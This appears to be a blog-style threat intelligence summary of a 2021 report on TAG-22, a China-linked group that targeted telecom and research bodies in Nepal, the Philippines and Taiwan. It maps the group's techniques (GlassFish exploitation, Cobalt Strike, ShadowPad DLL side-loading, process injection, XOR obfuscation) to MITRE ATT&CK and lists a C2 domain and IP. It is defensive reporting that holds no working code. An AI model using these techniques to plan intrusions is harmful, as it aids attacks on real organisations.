Jul 11, 2021
On July 8 2021, Insikt Group from Recorded Future published an intelligence report stating, “Chinese State – Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and other Tools”. The activities were noticed by the Inskit Group targeting telecom industries along industrial technologies institutes likely abusing compromised GlassFish servers and Cobalt Strike as initial access and leverage to exploit backdoors like ShadowPad, Spyder Backdoor and Winnti. In this incident, assets of Nepal Telecom were used as command and control servers.
Threat Activity Group 22 (TAG-22), a temporary name given by Insikt Group to private contractors (threat actors) operating historically on behalf of China’s Ministry of State Security (MSS). The group activities are supposed to overlap with activity clustered by name Winnti (APT41) and Barium.
Adversary (TAG-22), Capabilities (Cobalt Strike, Shadowpad, Spyder and Winnti) Infrastructure (TTP)
TTPs mapped to Mitre ATT&CK
Adversaries may use software, data, or commands to exploit a flaw in an Internet-facing computer or application in order to cause unintended or unexpected behavior. TAG-22 exploited GlassFish Server software versions 3.1.2 and lower, then leveraged the compromised infrastructure to execute onward intrusion activity, including scanning with the Acunetix scanner and deploying the Cobalt Strike offensive security tool.
In order to obtain access to victim systems, adversaries may send spear phishing emails with a malicious attachment. The TAG-22 Group has sent a malicious macros-enabled document to drop the Fishmaster loader. The group employed double extensions for Fishmaster Portable Executable (PE) files to make them look like Microsoft Office or PDF files for initial access
Adversaries may attempt to execute PowerShell commands and scripts. With PowerShell, Cobalt Strike can run a payload on a remote host. Also, APT41 used PowerShell to deliver malware in the environments of its victims.
Adversaries may use the Windows command shell to carry out their attacks. TAG-22 uses Cobalt Strike, and Cobalt Strike interacts with systems via a command-line interface. Cmd.exe was also used by overlapping APT41 to run commands on remote machines.
Adversaries may take use of Windows Management Instrumentation (WMI) to carry out their plans. Overlapping group APT41 uses WMI in a variety of ways, including command execution via WMIEXEC and persistence via PowerSploit. Also, WMI can be used by Cobalt Strike to deliver a payload to a remote host.
Adversaries may employ BITS jobs to execute or clean up after malicious payloads on a regular basis. BITSAdmin was used by APT41 to download and install payloads, and Cobalt Strike can use BITSAdmin to download a hosted “beacon” payload.
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. APT41 inserts Trojan backdoors into genuine Windows services. Cobalt Strike has the ability to set up a new service for persistence. For persistence, the Winnti backdoor registers its DLL file as a new service in the Registry.
Adversaries can leverage the search order used to load DLLs to run their own malicious payloads. To accomplish DLL side-loading of their malware, APT41 used legitimate executables. ShadowPad’s launcher is loaded via DLL side-loading from a legitimate executable.
Adversaries may inject code into processes to bypass process-based defenses and potentially elevate privileges. Cobalt Strike may inject a variety of payloads into processes that the adversary chooses dynamically. A wmplayer.exe process is injected with ShadowPad.
Adversaries may utilize obfuscated files or information to conceal intrusion artifacts from detection. Using a rolling XOR, Cobalt Strike can deobfuscate shellcode. Also ShadowPad launcher uses XOR to decrypt the payload and employs a custom algorithm.
If adversaries believe their malicious program has been detected, quarantined, or otherwise restricted, they may remove indicators from it. The “beacon” payload in Cobalt Strike can be modified to remove recognized signatures or unpacking methods. Also, to prevent disassembly, ShadowPad shellcode is XOR-encoded and uses false conditional jumps.
Hidden windows can be used by adversaries to hide destructive activity from consumers’ view. Windows that would normally be displayed when an application performs an operation can be hidden in specific instances. ShadowPad is injected into a hidden window’s wmplayer.exe process.
Adversaries may try to obtain a list of active application windows. The keylogging module in ShadowPad displays a list of all open applications.
Adversaries may enumerate files and directories or look for specific information within a file system in specified locations on a host or network share. The Recent Files module in ShadowPad displays a list of files that have been accessed recently.
Adversaries may search for information about the network setup and settings of systems they access, or through remote system information discovery. The IP addresses of domain controllers can be determined by Cobalt Strike.
By querying for information via the network, adversaries may attempt to obtain a list of network connections to or from the compromised system they are currently accessing, as well as from remote systems. From compromised hosts, Cobalt Strike can generate a session report.
Users’ keystrokes may be recorded by adversaries in order to steal credentials as they are typed. ShadowPad has a keylogging module.
Adversaries may attempt to acquire screen captures of the desktop in order to gather information. A screenshot module is included in ShadowPad.
Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. TAG-22 has used HTTP and HTTPS for C&C communications.
Adversaries may communicate using a protocol and port combination that are not normally associated. TAG-22 uses TCP: 56006 for C&C communications.
This technique is used by TAG-22 to exfiltrate data from an existing Command and Control Server.
TAG-22 intrusions targeting the following companies in Taiwan, Nepal, and the Philippines were discovered in June 2021 using Recorded Future Network Traffic Analysis (NTA) data:
Department of Information and Communications Technology (The Philippines)
The Industrial Technology Research Institute (ITRI) in Taiwan
TAG-22 C2 domain vt.livehost[.]live were discovered connecting to the Shadowpad and Spyder backdoors, which combine Recorded Future C2 detections and passive DNS data. This allows it to pivot and pinpoint the TAG-22 IP address 126.96.36.199, which researchers discovered the group is using for both Shadowpad and Spyder command and control.
The summary graph is shown in the figure below